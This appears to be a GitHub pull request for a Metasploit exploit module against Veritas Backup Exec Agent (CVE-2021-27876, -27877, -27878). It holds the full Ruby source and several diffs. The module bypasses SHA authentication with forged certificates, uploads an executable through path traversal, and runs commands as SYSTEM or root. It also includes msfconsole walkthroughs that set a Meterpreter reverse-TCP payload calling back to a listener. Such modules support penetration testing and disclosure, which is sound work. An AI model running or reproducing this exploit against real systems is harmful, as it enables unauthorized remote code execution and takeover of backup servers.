+[*] 172.16.180.135:10000 - Supported authentication by BE agent: BEWS2 (190), SSPI (4)
+[*] 172.16.180.135:10000 - BE agent revision: 9.4
+[-] 172.16.180.135:10000 - Exploit aborted due to failure: not-vulnerable: The target is not exploitable. SHA authentication is disabled "set ForceExploit true" to override check result.
 [*] Exploit completed, but no session was created.
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > 
 ```

--- a/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb
+++ b/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb
@@ -12,6 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::NDMPSocket
   include Msf::Exploit::CmdStager
   include Msf::Exploit::EXE
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(

--- a/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb
+++ b/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
           This authentication scheme is no longer used within Backup Exec versions, but hadn’t yet been disabled.
           An attacker could remotely exploit the SHA authentication scheme to gain unauthorized access to
           the BE Agent and execute an arbitrary OS command on the host with NT AUTHORITY\SYSTEM or root privileges
-          depending on using platform.
+          depending on the platform.
 
           The vulnerability presents in 16.x, 20.x and 21.x versions of Backup Exec up to 21.2 (or up to and
           including Backup Exec Remote Agent revision 9.3)

--- a/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb
+++ b/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb
@@ -96,20 +96,20 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Exploiting ...')
 
     ndmp_status, ndmp_sock, msg_fail_reason = ndmp_connect
-    return print_error("Can not connect to BE Agent service. #{msg_fail_reason}") unless ndmp_status
+    fail_with(Msf::Module::Failure::NotFound, "Can not connect to BE Agent service. #{msg_fail_reason}") unless ndmp_status
 
     ndmp_status, msg_fail_reason = tls_enabling(ndmp_sock)
-    return print_error("Can not establish TLS connection. #{msg_fail_reason}") unless ndmp_status
+    fail_with(Msf::Module::Failure::UnexpectedReply, "Can not establish TLS connection. #{msg_fail_reason}") unless ndmp_status
 
     ndmp_status, msg_fail_reason = sha_authentication(ndmp_sock)
-    return print_error("Can not authenticate with SHA. #{msg_fail_reason}") unless ndmp_status
+    fail_with(Msf::Module::Failure::NotVulnerable, "Can not authenticate with SHA. #{msg_fail_reason}") unless ndmp_status
 
     if target.opts['Platform'] == 'win'
       filename = "#{rand_text_alpha(8)}.exe"
       ndmp_status, msg_fail_reason = win_write_upload(ndmp_sock, filename)
       if ndmp_status
         ndmp_status, msg_fail_reason = exec_win_command(ndmp_sock, filename)
-        return print_error("Can not execute payload. #{msg_fail_reason}") unless ndmp_status
+        fail_with(Msf::Module::Failure::PayloadFailed, "Can not execute payload. #{msg_fail_reason}") unless ndmp_status
       else
         print_status('Can not upload payload with NDMP_FILE_WRITE packet. Trying to upload with CmdStager')
         execute_cmdstager({ ndmp_sock: ndmp_sock, linemax: 512 })
@@ -189,7 +189,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body)
     unless ndmp_payload.err_code.zero?
-      return [false, nil, "Error code of SSL_HANDSHAKE_CSR_REQ (2) packet: #{ndmp_payload.err_code}"]
+      return [false, "Error code of SSL_HANDSHAKE_CSR_REQ (2) packet: #{ndmp_payload.err_code}"]
     end
 
     ndmp_tls_certs.sign_agent_csr(ndmp_payload.data)
@@ -202,7 +202,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body)
     unless ndmp_payload.err_code.zero?
-      return [false, nil, "Error code of SSL_HANDSHAKE_CSR_SIGNED (3) packet: #{ndmp_payload.err_code}"]
+      return [false, "Error code of SSL_HANDSHAKE_CSR_SIGNED (3) packet: #{ndmp_payload.err_code}"]
     end
 
     ndmp_msg = ndmp_sock.do_request_response(
@@ -213,7 +213,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body)
     unless ndmp_payload.err_code.zero?
-      return [false, nil, "Error code of SSL_HANDSHAKE_CONNECT (4) packet: #{ndmp_payload.err_code}"]
+      return [false, "Error code of SSL_HANDSHAKE_CONNECT (4) packet: #{ndmp_payload.err_code}"]
     end
 
     ssl_context = OpenSSL::SSL::SSLContext.new

--- a/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb
+++ b/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb
@@ -70,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      OptString.new('INTERPRETER', [true, 'The command line interpreter for executing OS command', '/bin/bash'],
+      OptString.new('SHELL', [true, 'The shell for executing OS command', '/bin/bash'],
                     conditions: ['TARGET', '==', 'Linux'])
     ])
     deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')

--- a/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb
+++ b/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
     when 'win'
       wrap_cmd = "C:\\Windows\\System32\\cmd.exe /c \"#{cmd}\""
     when 'linux'
-      wrap_cmd = "#{datastore['INTERPRETER']} -c \"#{cmd}\""
+      wrap_cmd = "#{datastore['SHELL']} -c \"#{cmd}\""
     end
     ndmp_sock = opts[:ndmp_sock]
     ndmp_sock.do_request_response(

--- a/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb
+++ b/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb
@@ -70,9 +70,9 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-                       OptString.new('INTERPRETER', [true, 'The command line interpreter for executing OS command', '/bin/bash'],
-                                     conditions: ['TARGET', '==', 'Linux'])
-                     ])
+      OptString.new('INTERPRETER', [true, 'The command line interpreter for executing OS command', '/bin/bash'],
+                    conditions: ['TARGET', '==', 'Linux'])
+    ])
     deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')
   end
 
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
       wrap_cmd = "#{datastore['INTERPRETER']} -c \"#{cmd}\""
     end
     ndmp_sock = opts[:ndmp_sock]
-    ndmp_msg = ndmp_sock.do_request_response(
+    ndmp_sock.do_request_response(
       NDMP::Message.new_request(
         NDMP_EXECUTE_COMMAND,
         NdmpExecuteCommandReq.new({ cmd: wrap_cmd, unknown: 0 }).to_xdr

--- a/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb
+++ b/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb
@@ -132,10 +132,10 @@ class MetasploitModule < Msf::Exploit::Remote
       NDMP::Message.new_request(NDMP::Message::CONFIG_GET_SERVER_INFO)
     )
     ndmp_payload = NdmpConfigGetServerInfoRes.from_xdr(ndmp_msg.body)
-    print_line("Supported authentication by BE agent: #{ndmp_payload.auth_types.map do |k, _|
+    print_status("Supported authentication by BE agent: #{ndmp_payload.auth_types.map do |k, _|
                                                           "#{AUTH_TYPES[k]} (#{k})"
                                                         end.join(', ')}")
-    print_line("BE agent revision: #{ndmp_payload.revision}")
+    print_status("BE agent revision: #{ndmp_payload.revision}")
 
     if ndmp_payload.auth_types.include?(5)
       Exploit::CheckCode::Appears('SHA authentication is enabled')

--- a/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb
+++ b/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb
@@ -1,0 +1,536 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::NDMPSocket
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Veritas Backup Exec Agent Remote Code Execution',
+        'Description' => %q{
+          Veritas Backup Exec Agent supports multiple authentication schemes and SHA authentication is one of them.
+          This authentication scheme is no longer used within Backup Exec versions, but hadn’t yet been disabled.
+          An attacker could remotely exploit the SHA authentication scheme to gain unauthorized access to
+          the BE Agent and execute an arbitrary OS command on the host with NT AUTHORITY\SYSTEM or root privileges
+          depending on using platform.
+
+          The vulnerability presents in 16.x, 20.x and 21.x versions of Backup Exec up to 21.2 (or up to and
+          including Backup Exec Remote Agent revision 9.3)
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['Alexander Korotin <alexander.korotin[at]kaspersky.com>'],
+        'References' => [
+          ['CVE', '2021-27876'],
+          ['CVE', '2021-27877'],
+          ['CVE', '2021-27878'],
+          ['URL', 'https://www.veritas.com/content/support/en_US/security/VTS21-001']
+        ],
+        'Platform' => %w[win linux],
+        'Targets' => [
+          [
+            'Windows',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'CmdStagerFlavor' => %w[certutil vbs psh_invokewebrequest debug_write debug_asm]
+            }
+          ],
+          [
+            'Linux',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'CmdStagerFlavor' => %w[bourne wget curl echo]
+            }
+          ]
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 10_000
+        },
+        'Privileged' => true,
+        'DisclosureDate' => '2021-03-01',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => [UNRELIABLE_SESSION],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+                       OptString.new('INTERPRETER', [true, 'The command line interpreter for executing OS command', '/bin/bash'],
+                                     conditions: ['TARGET', '==', 'Linux'])
+                     ])
+    deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')
+  end
+
+  def execute_command(cmd, opts = {})
+    case target.opts['Platform']
+    when 'win'
+      wrap_cmd = "C:\\Windows\\System32\\cmd.exe /c \"#{cmd}\""
+    when 'linux'
+      wrap_cmd = "#{datastore['INTERPRETER']} -c \"#{cmd}\""
+    end
+    ndmp_sock = opts[:ndmp_sock]
+    ndmp_msg = ndmp_sock.do_request_response(
+      NDMP::Message.new_request(
+        NDMP_EXECUTE_COMMAND,
+        NdmpExecuteCommandReq.new({ cmd: wrap_cmd, unknown: 0 }).to_xdr
+      )
+    )
+  end
+
+  def exploit
+    print_status('Exploiting ...')
+
+    ndmp_status, ndmp_sock, msg_fail_reason = ndmp_connect
+    return print_error("Can not connect to BE Agent service. #{msg_fail_reason}") unless ndmp_status
+
+    ndmp_status, msg_fail_reason = tls_enabling(ndmp_sock)
+    return print_error("Can not establish TLS connection. #{msg_fail_reason}") unless ndmp_status
+
+    ndmp_status, msg_fail_reason = sha_authentication(ndmp_sock)
+    return print_error("Can not authenticate with SHA. #{msg_fail_reason}") unless ndmp_status
+
+    if target.opts['Platform'] == 'win'
+      filename = "#{rand_text_alpha(8)}.exe"
+      ndmp_status, msg_fail_reason = win_write_upload(ndmp_sock, filename)
+      if ndmp_status
+        ndmp_status, msg_fail_reason = exec_win_command(ndmp_sock, filename)
+        return print_error("Can not execute payload. #{msg_fail_reason}") unless ndmp_status
+      else
+        print_status('Can not upload payload with NDMP_FILE_WRITE packet. Trying to upload with CmdStager')
+        execute_cmdstager({ ndmp_sock: ndmp_sock, linemax: 512 })
+      end
+    else
+      print_status('Uploading payload with CmdStager')
+      execute_cmdstager({ ndmp_sock: ndmp_sock, linemax: 512 })
+    end
+  end
+
+  def check
+    print_status('Checking vulnerability')
+
+    ndmp_status, ndmp_sock, msg_fail_reason = ndmp_connect
+    return Exploit::CheckCode::Unknown("Can not connect to BE Agent service. #{msg_fail_reason}") unless ndmp_status
+
+    print_status('Getting supported authentication types')
+    ndmp_msg = ndmp_sock.do_request_response(
+      NDMP::Message.new_request(NDMP::Message::CONFIG_GET_SERVER_INFO)
+    )
+    ndmp_payload = NdmpConfigGetServerInfoRes.from_xdr(ndmp_msg.body)
+    print_line("Supported authentication by BE agent: #{ndmp_payload.auth_types.map do |k, _|
+                                                          "#{AUTH_TYPES[k]} (#{k})"
+                                                        end.join(', ')}")
+    print_line("BE agent revision: #{ndmp_payload.revision}")
+
+    if ndmp_payload.auth_types.include?(5)
+      Exploit::CheckCode::Appears('SHA authentication is enabled')
+    else
+      Exploit::CheckCode::Safe('SHA authentication is disabled')
+    end
+  end
+
+  def ndmp_connect
+    print_status('Connecting to BE Agent service')
+    ndmp_msg = nil
+    begin
+      ndmp_sock = NDMP::Socket.new(connect)
+    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout,
+           Rex::ConnectionRefused => e
+      return [false, nil, e.to_s]
+    end
+    begin
+      Timeout.timeout(datastore['ConnectTimeout']) do
+        ndmp_msg = ndmp_sock.read_ndmp_msg(NDMP::Message::NOTIFY_CONNECTED)
+      end
+    rescue Timeout::Error
+      return [false, nil, 'No NDMP_NOTIFY_CONNECTED (0x502) packet from BE Agent service']
+    else
+      ndmp_payload = NdmpNotifyConnectedRes.from_xdr(ndmp_msg.body)
+    end
+
+    ndmp_msg = ndmp_sock.do_request_response(
+      NDMP::Message.new_request(
+        NDMP::Message::CONNECT_OPEN,
+        NdmpConnectOpenReq.new({ version: ndmp_payload.version }).to_xdr
+      )
+    )
+
+    ndmp_payload = NdmpConnectOpenRes.from_xdr(ndmp_msg.body)
+    unless ndmp_payload.err_code.zero?
+      return [false, ndmp_sock, "Error code of NDMP_CONNECT_OPEN (0x900) packet: #{ndmp_payload.err_code}"]
+    end
+
+    [true, ndmp_sock, nil]
+  end
+
+  def tls_enabling(ndmp_sock)
+    print_status('Enabling TLS for NDMP connection')
+    ndmp_tls_certs = NdmpTlsCerts.new('VeritasBE', datastore['RHOSTS'].to_s)
+    ndmp_tls_certs.forge_ca
+    ndmp_msg = ndmp_sock.do_request_response(
+      NDMP::Message.new_request(
+        NDMP_SSL_HANDSHAKE,
+        NdmpSslHandshakeReq.new(ndmp_tls_certs.default_sslpacket_content(NdmpTlsCerts::SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CSR_REQ])).to_xdr
+      )
+    )
+    ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body)
+    unless ndmp_payload.err_code.zero?
+      return [false, nil, "Error code of SSL_HANDSHAKE_CSR_REQ (2) packet: #{ndmp_payload.err_code}"]
+    end
+
+    ndmp_tls_certs.sign_agent_csr(ndmp_payload.data)
+
+    ndmp_msg = ndmp_sock.do_request_response(
+      NDMP::Message.new_request(
+        NDMP_SSL_HANDSHAKE,
+        NdmpSslHandshakeReq.new(ndmp_tls_certs.default_sslpacket_content(NdmpTlsCerts::SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CSR_SIGNED])).to_xdr
+      )
+    )
+    ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body)
+    unless ndmp_payload.err_code.zero?
+      return [false, nil, "Error code of SSL_HANDSHAKE_CSR_SIGNED (3) packet: #{ndmp_payload.err_code}"]
+    end
+
+    ndmp_msg = ndmp_sock.do_request_response(
+      NDMP::Message.new_request(
+        NDMP_SSL_HANDSHAKE,
+        NdmpSslHandshakeReq.new(ndmp_tls_certs.default_sslpacket_content(NdmpTlsCerts::SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CONNECT])).to_xdr
+      )
+    )
+    ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body)
+    unless ndmp_payload.err_code.zero?
+      return [false, nil, "Error code of SSL_HANDSHAKE_CONNECT (4) packet: #{ndmp_payload.err_code}"]
+    end
+
+    ssl_context = OpenSSL::SSL::SSLContext.new
+    ssl_context.add_certificate(ndmp_tls_certs.ca_cert, ndmp_tls_certs.ca_key)
+    ndmp_sock.wrap_with_ssl(ssl_context)
+    [true, nil]
+  end
+
+  def sha_authentication(ndmp_sock)
+    print_status('Passing SHA authentication')
+    ndmp_msg = ndmp_sock.do_request_response(
+      NDMP::Message.new_request(
+        NDMP_CONFIG_GET_AUTH_ATTR,
+        NdmpConfigGetAuthAttrReq.new({ auth_type: 5 }).to_xdr
+      )
+    )
+    ndmp_payload = NdmpConfigGetAuthAttrRes.from_xdr(ndmp_msg.body)
+    unless ndmp_payload.err_code.zero?
+      return [false, "Error code of NDMP_CONFIG_GET_AUTH_ATTR (0x103) packet: #{ndmp_payload.err_code}"]
+    end
+
+    ndmp_msg = ndmp_sock.do_request_response(
+      NDMP::Message.new_request(
+        NDMP::Message::CONNECT_CLIENT_AUTH,
+        NdmpConnectClientAuthReq.new(
+          {
+            auth_type: 5,
+            username: 'Administrator', # Doesn't metter
+            hash: Digest::SHA256.digest("\x00" * 64 + ndmp_payload.challenge)
+          }
+        ).to_xdr
+      )
+    )
+    ndmp_payload = NdmpConnectClientAuthRes.from_xdr(ndmp_msg.body)
+    unless ndmp_payload.err_code.zero?
+      return [false, "Error code of NDMP_CONECT_CLIENT_AUTH (0x901) packet: #{ndmp_payload.err_code}"]
+    end
+
+    [true, nil]
+  end
+
+  def win_write_upload(ndmp_sock, filename)
+    print_status('Uploading payload with NDMP_FILE_WRITE packet')
+    ndmp_msg = ndmp_sock.do_request_response(
+      NDMP::Message.new_request(
+        NDMP_FILE_OPEN_EXT,
+        NdmpFileOpenExtReq.new(
+          {
+            filename: filename,
+            dir: '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\Temp',
+            mode: 4
+          }
+        ).to_xdr
+      )
+    )
+    ndmp_payload = NdmpFileOpenExtRes.from_xdr(ndmp_msg.body)
+    unless ndmp_payload.err_code.zero?
+      return [false, "Error code of NDMP_FILE_OPEN_EXT (0xf308) packet: #{ndmp_payload.err_code}"]
+    end
+
+    hnd = ndmp_payload.handler
+    exe = generate_payload_exe
+    offset = 0
+    block_size = 2048
+
+    while offset < exe.length
+      ndmp_msg = ndmp_sock.do_request_response(
+        NDMP::Message.new_request(
+          NDMP_FILE_WRITE,
+          NdmpFileWriteReq.new({ handler: hnd, len: block_size, data: exe[offset, block_size] }).to_xdr
+        )
+      )
+      ndmp_payload = NdmpFileWriteRes.from_xdr(ndmp_msg.body)
+      unless ndmp_payload.err_code.zero?
+        return [false, "Error code of NDMP_FILE_WRITE (0xF309) packet: #{ndmp_payload.err_code}"]
+      end
+
+      offset += block_size
+    end
+
+    ndmp_msg = ndmp_sock.do_request_response(
+      NDMP::Message.new_request(
+        NDMP_FILE_CLOSE,
+        NdmpFileCloseReq.new({ handler: hnd }).to_xdr
+      )
+    )
+    ndmp_payload = NdmpFileCloseRes.from_xdr(ndmp_msg.body)
+    unless ndmp_payload.err_code.zero?
+      return [false, "Error code of NDMP_FILE_CLOSE (0xF306) packet: #{ndmp_payload.err_code}"]
+    end
+
+    [true, nil]
+  end
+
+  def exec_win_command(ndmp_sock, filename)
+    cmd = "C:\\Windows\\System32\\cmd.exe /c \"C:\\Windows\\Temp\\#{filename}\""
+    ndmp_msg = ndmp_sock.do_request_response(
+      NDMP::Message.new_request(
+        NDMP_EXECUTE_COMMAND,
+        NdmpExecuteCommandReq.new({ cmd: cmd, unknown: 0 }).to_xdr
+      )
+    )
+    ndmp_payload = NdmpExecuteCommandRes.from_xdr(ndmp_msg.body)
+    unless ndmp_payload.err_code.zero?
+      return [false, "Error code of NDMP_EXECUTE_COMMAND (0xF30F) packet: #{ndmp_payload.err_code}"]
+    end
+
+    [true, nil]
+  end
+
+  # Class to create CA and client certificates
+  class NdmpTlsCerts
+    def initialize(hostname, ip)
+      @hostname = hostname
+      @ip = ip
+      @ca_key = nil
+      @ca_cert = nil
+      @be_agent_cert = nil
+    end
+
+    SSL_HANDSHAKE_TYPES = {
+      SSL_HANDSHAKE_TEST_CERT: 1,
+      SSL_HANDSHAKE_CSR_REQ: 2,
+      SSL_HANDSHAKE_CSR_SIGNED: 3,
+      SSL_HANDSHAKE_CONNECT: 4
+    }.freeze
+
+    attr_reader :ca_cert, :ca_key
+
+    def forge_ca
+      @ca_key = OpenSSL::PKey::RSA.new(2048)
+      @ca_cert = OpenSSL::X509::Certificate.new
+      @ca_cert.version = 2
+      @ca_cert.serial = rand(2**32..2**64 - 1)
+      @ca_cert.subject = @ca_cert.issuer = OpenSSL::X509::Name.parse("/CN=#{@hostname}")
+      extn_factory = OpenSSL::X509::ExtensionFactory.new(@ca_cert, @ca_cert)
+      @ca_cert.extensions = [
+        extn_factory.create_extension('subjectKeyIdentifier', 'hash'),
+        extn_factory.create_extension('basicConstraints', 'CA:TRUE'),
+        extn_factory.create_extension('keyUsage', 'keyCertSign, cRLSign')
+      ]
+      @ca_cert.add_extension(extn_factory.create_extension('authorityKeyIdentifier', 'keyid:always'))
+      @ca_cert.public_key = @ca_key.public_key
+      @ca_cert.not_before = Time.now - 7 * 60 * 60 * 24
+      @ca_cert.not_after = Time.now + 14 * 24 * 60 * 60
+      @ca_cert.sign(@ca_key, OpenSSL::Digest.new('SHA256'))
+    end
+
+    def sign_agent_csr(csr)
+      o_csr = OpenSSL::X509::Request.new(csr)
+      @be_agent_cert = OpenSSL::X509::Certificate.new
+      @be_agent_cert.version = 2
+      @be_agent_cert.serial = rand(2**32..2**64 - 1)
+      @be_agent_cert.not_before = Time.now - 7 * 60 * 60 * 24
+      @be_agent_cert.not_after = Time.now + 14 * 24 * 60 * 60
+      @be_agent_cert.issuer = @ca_cert.subject
+      @be_agent_cert.subject = o_csr.subject
+      @be_agent_cert.public_key = o_csr.public_key
+      @be_agent_cert.sign(@ca_key, OpenSSL::Digest.new('SHA256'))
+    end
+
+    def default_sslpacket_content(ssl_packet_type)
+      if ssl_packet_type == SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CSR_SIGNED]
+        ca_cert = @ca_cert.to_s
+        agent_cert = @be_agent_cert.to_s
+      else
+        ca_cert = ''
+        agent_cert = ''
+      end
+      {
+        ssl_packet_type: ssl_packet_type,
+        hostname: @hostname,
+        nb_hostname: @hostname.upcase,
+        ip_addr: @ip,
+        cert_id1: get_cert_id(@ca_cert),
+        cert_id2: get_cert_id(@ca_cert),
+        unknown1: 0,
+        unknown2: 0,
+        ca_cert_len: ca_cert.length,
+        ca_cert: ca_cert,
+        agent_cert_len: agent_cert.length,
+        agent_cert: agent_cert
+      }
+    end
+
+    def get_cert_id(cert)
+      Digest::SHA1.digest(cert.issuer.to_s + cert.serial.to_s(2))[0...4].unpack1('L<')
+    end
+  end
+
+  NDMP_CONFIG_GET_AUTH_ATTR = 0x103
+  NDMP_SSL_HANDSHAKE = 0xf383
+  NDMP_EXECUTE_COMMAND = 0xf30f
+  NDMP_FILE_OPEN_EXT = 0xf308
+  NDMP_FILE_WRITE = 0xF309
+  NDMP_FILE_CLOSE = 0xF306
+
+  AUTH_TYPES = {
+    1 => 'Text',
+    2 => 'MD5',
+    3 => 'BEWS',
+    4 => 'SSPI',
+    5 => 'SHA',
+    190 => 'BEWS2' # 0xBE
+  }.freeze
+
+  # Responce packets
+  class NdmpNotifyConnectedRes < XDR::Struct
+    attribute :connected, XDR::Int
+    attribute :version, XDR::Int
+    attribute :reason, XDR::Int
+  end
+
+  class NdmpConnectOpenRes < XDR::Struct
+    attribute :err_code, XDR::Int
+  end
+
+  class NdmpConfigGetServerInfoRes < XDR::Struct
+    attribute :err_code, XDR::Int
+    attribute :vendor_name, XDR::String[]
+    attribute :product_name, XDR::String[]
+    attribute :revision, XDR::String[]
+    attribute :auth_types, XDR::VarArray[XDR::Int]
+  end
+
+  class NdmpConfigGetHostInfoRes < XDR::Struct
+    attribute :err_code, XDR::Int
+    attribute :hostname, XDR::String[]
+    attribute :os, XDR::String[]
+    attribute :os_info, XDR::String[]
+    attribute :ip, XDR::String[]
+  end
+
+  class NdmpSslHandshakeRes < XDR::Struct
+    attribute :data_len, XDR::Int
+    attribute :data, XDR::String[]
+    attribute :err_code, XDR::Int
+    attribute :unknown4, XDR::String[]
+  end
+
+  class NdmpConfigGetAuthAttrRes < XDR::Struct
+    attribute :err_code, XDR::Int
+    attribute :auth_type, XDR::Int
+    attribute :challenge, XDR::Opaque[64]
+  end
+
+  class NdmpConnectClientAuthRes < XDR::Struct
+    attribute :err_code, XDR::Int
+  end
+
+  class NdmpExecuteCommandRes < XDR::Struct
+    attribute :err_code, XDR::Int
+  end
+
+  class NdmpFileOpenExtRes < XDR::Struct
+    attribute :err_code, XDR::Int
+    attribute :handler, XDR::Int
+  end
+
+  class NdmpFileWriteRes < XDR::Struct
+    attribute :err_code, XDR::Int
+    attribute :recv_len, XDR::Int
+    attribute :unknown, XDR::Int
+  end
+
+  class NdmpFileCloseRes < XDR::Struct
+    attribute :err_code, XDR::Int
+  end
+
+  # Request packets
+  class NdmpConnectOpenReq < XDR::Struct
+    attribute :version, XDR::Int
+  end
+
+  class NdmpSslHandshakeReq < XDR::Struct
+    attribute :ssl_packet_type, XDR::Int
+    attribute :nb_hostname, XDR::String[]
+    attribute :hostname, XDR::String[]
+    attribute :ip_addr, XDR::String[]
+    attribute :cert_id1, XDR::Int
+    attribute :cert_id2, XDR::Int
+    attribute :unknown1, XDR::Int
+    attribute :unknown2, XDR::Int
+    attribute :ca_cert_len, XDR::Int
+    attribute :ca_cert, XDR::String[]
+    attribute :agent_cert_len, XDR::Int
+    attribute :agent_cert, XDR::String[]
+  end
+
+  class NdmpConfigGetAuthAttrReq < XDR::Struct
+    attribute :auth_type, XDR::Int
+  end
+
+  class NdmpConnectClientAuthReq < XDR::Struct
+    attribute :auth_type, XDR::Int
+    attribute :username, XDR::String[]
+    attribute :hash, XDR::Opaque[32]
+  end
+
+  class NdmpExecuteCommandReq < XDR::Struct
+    attribute :cmd, XDR::String[]
+    attribute :unknown, XDR::Int
+  end
+
+  class NdmpFileOpenExtReq < XDR::Struct
+    attribute :filename, XDR::String[]
+    attribute :dir, XDR::String[]
+    attribute :mode, XDR::Int
+  end
+
+  class NdmpFileWriteReq < XDR::Struct
+    attribute :handler, XDR::Int
+    attribute :len, XDR::Int
+    attribute :data, XDR::String[]
+  end
+
+  class NdmpFileCloseReq < XDR::Struct
+    attribute :handler, XDR::Int
+  end
+end

--- a/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb
+++ b/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
           including Backup Exec Remote Agent revision 9.3)
         },
         'License' => MSF_LICENSE,
-        'Author' => ['Alexander Korotin <alexander.korotin[at]kaspersky.com>'],
+        'Author' => ['Alexander Korotin <0xc0rs[at]gmail.com>'],
         'References' => [
           ['CVE', '2021-27876'],
           ['CVE', '2021-27877'],


### PR DESCRIPTION
Add Veritas Backup Exec Agent Remote Code Execution exploit. 

```
The module allows to exploit a chain of the vulnerabilities CVE-2021-27876, 
CVE-2021-27877 and CVE-2021-27878 in Veritas Backup Exec Agent (up to
version 21.2 or agent revision 9.4) which leads to remote code execution with
privileges of system user (`NT AUTHORITY\SYSTEM` or `root`) by default.

This module has been tested successfully on Windows 7 Ultimate (6.1.7601
Service Pack 1 Build 7601) and Debian 9 (x86_64) with kernel version
4.9.0-13-amd64.

Veritas Security Bulletin: https://www.veritas.com/content/support/en_US/security/VTS21-001
```

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/multi/veritas/beagent_sha_auth_rce`
- [x] `set RHOSTS <TARGET_IP>`
- [x] `set TARGET <OS_NAME>`
- [x] `set PAYLOAD <PAYLOAD_NAME>`
- [x] `exploit` 
- [x] **Verify you get a NT AUTHORITY\SYSTEM or root session**

## Scenarios

```
msf6 > use exploit/multi/veritas/beagent_sha_auth_rce
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set RHOSTS 172.16.180.141
RHOSTS => 172.16.180.141
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > check

[*] 172.16.180.141:10000 - Checking vulnerability
[*] 172.16.180.141:10000 - Connecting to BE Agent service
[*] 172.16.180.141:10000 - Getting supported authentication types
Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
BE agent revision: 9.3
[*] 172.16.180.141:10000 - The target appears to be vulnerable. SHA authentication is enabled
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set TARGET Windows
TARGET => Windows
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set LHOST 172.16.180.248
LHOST => 172.16.180.248
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > show options 

Module options (exploit/multi/veritas/beagent_sha_auth_rce):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   172.16.180.141   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    10000            yes       The target port (TCP)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.180.248   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run

[*] Started reverse TCP handler on 172.16.180.248:4444 
[*] 172.16.180.141:10000 - Exploiting ...
